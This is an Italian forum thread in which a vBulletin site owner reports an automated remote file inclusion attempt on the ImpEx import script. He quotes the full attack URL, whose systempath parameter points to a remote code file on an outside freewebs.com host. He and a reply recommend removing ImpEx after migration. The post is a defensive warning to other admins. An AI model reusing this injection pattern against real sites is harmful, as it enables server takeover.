- Home
- Categorie
- Coding e Sistemistica
- CMS & Piattaforme Self-Hosted
- Tentativo hacking con vBulletin Impex
-
Tentativo hacking con vBulletin Impex
Forse hacking non è il termine più adatto, magari cracking ma l'ho usato perchè è ormai in uso comune.
Oggi casualmente guardando gli utenti online nel mio forum e le posizioni vedo http://www.miosito.com/forum/sitemap/impex/ImpExData.php?systempath=http://www.freewebs.com/newila/off.txt??
Visitando l'indirizzo di tale bastardo su freewebs (spazio personale) www.freewebs.com/newila/off.txt mi ritrovo davanti ad un bel po' di codice che sembrerebbe ad-hoc per richiedere l'accesso al server.
Poi in rete trovo questo http://www.securityfocus.com/bid/17206
Ditemi un po' voi... solo che impex non lo sto usando e comunque sembra che l'attacco sia automatico dato che ha sbagliato indirizzo usando /forum/sitemap/impex....
Se i mod lo ritengono un topic inadatto lo cancellino pure...
Consiglio comunque a tutti di rimuovere impex dopo il passaggio da una board differente a vbulletin, io lo avevo tempo fa e se lo avessi avuto ancora e avrebbero beccato l'indirizzo giusto forse l'attacco avrebbe avuto successo.
-
In effetti è un bel rischio e credo sia già consigliato di disabilitarlo dopo l'import.